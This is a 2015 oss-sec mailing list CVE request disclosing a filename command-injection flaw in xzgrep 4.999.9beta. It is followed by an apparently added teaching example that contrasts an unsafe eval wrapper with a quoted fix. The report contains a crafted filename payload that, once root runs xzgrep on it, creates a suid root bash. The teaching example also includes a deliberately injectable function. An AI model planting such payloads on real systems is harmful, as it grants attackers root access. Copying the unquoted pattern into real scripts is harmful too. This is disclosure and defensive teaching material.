oss-sec mailing list archives

CVE request: xzgrep 4.999.9beta arbitrary code execution vulnerability


From: Bart Dopheide <dopheide () fmf nl>
Date: Mon, 18 May 2015 13:16:33 +0200

I discovered a bug in xzgrep 4.999.9beta. Please assign a CVE for this 
vulnerability.

* Affected versions: 4.999.9beta
* Fixed versions: 5.0.0 and up, 5.2.0 and up
* Description:

xzgrep 4.999.9beta processes filenames containing a semicolon 
incorrectly, which allows for arbitrary code execution as the local user 
running xzgrep.

Demonstration of the vulnerability:
  sh-4.1$ touch /tmp/semi\;colon
  sh-4.1$ xzgrep anystring /tmp/semi\;colon 
  xz: /tmp/semi: No such file or directory
  /usr/bin/xzgrep: line 199: colon: command not found
  sh-4.1$ 
xzgrep tries to extract/grep /tmp/semi and tries to execute "colon", which 
is obviously not wanted.

With a specially crafted filename and three ounces of social 
engineering, a local root exploit is possible. For example:
  sh-4.1$ touch '/var/tmp/;echo -e "cp -p \0057bin\0057bash \0057var\0057tmp\0057\nchmod u+s \0057var\0057tmp\0057bash" 
zzz;sh zzz;rm -f zzz'
  sh-4.1# find /var/tmp -type f -exec xzgrep anystring {} \+
A suid root /var/tmp/bash should be the result.

I checked RHEL 6, CentOS 6: they run 4.999.9beta and they are vulnerable.

--
Bart Dopheide
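The defect described above, reduced to a toy wrapper so the fix can be seen next to it. This is an added example written for this page; it is not code from the xz project or from the report. It mirrors the xzgrep design of assembling a command string and handing it to eval (a decompressor piped into grep), once with the filename spliced in unquoted and once through a single-quote escaping helper. The helper name shell_quote, the function names, the work directory and the sample filenames are all assumptions made for the demo.

```shell
#!/bin/sh
# Added example, not code from xz or from the report: a toy grep wrapper
# that builds a command string for eval, first with the filename
# unquoted (the 4.999.9beta-style defect) and then through a quoting
# helper that keeps any filename a single literal shell word.

# Constructed work area and sample files (names are assumptions).
WORK=${TMPDIR:-/tmp}/xzgrep-quote-demo.$$
mkdir -p "$WORK"
trap 'rm -rf "$WORK"' EXIT
printf 'needle\nhay\nneedle\n' > "$WORK/plain.txt"
printf 'needle\n' > "$WORK/semi;colon.txt"
printf 'needle\nneedle\n' > "$WORK/it's;here.txt"

# shell_quote STRING: emit STRING as one single-quoted shell word, turning
# each embedded ' into '\'' (close quote, escaped quote, reopen quote).
# Trailing newlines in STRING are dropped by the command substitution;
# that limitation is accepted for this demo.
shell_quote() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# unsafe_count PATTERN FILE: the defect. FILE becomes part of the command
# text, so the shell re-parses it and a ';' in the name ends the command
# early and starts another one, exactly as in the report.
unsafe_count() {
    eval "cat $2 | grep -c -- $1"
}

# safe_count PATTERN FILE: the same eval-based design, but both operands
# are quoted before they become command text, so they stay single words
# whatever characters the filename contains.
safe_count() {
    eval "cat $(shell_quote "$2") | grep -c -- $(shell_quote "$1")"
}

# count_needles NAME: count lines matching "needle" in a sample file.
count_needles() {
    safe_count needle "$WORK/$1"
}

# Demo run: every name is treated as one path by the quoted wrapper.
for f in plain.txt 'semi;colon.txt' "it's;here.txt"; do
    printf '%s: %s\n' "$f" "$(count_needles "$f")"
done
```

The helper is the whole fix: the command is still assembled as text and still eval'd, but a filename can no longer change the structure of that text. Rejecting names that contain metacharacters would be the wrong lesson, since such names are legal and the quoting handles them.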
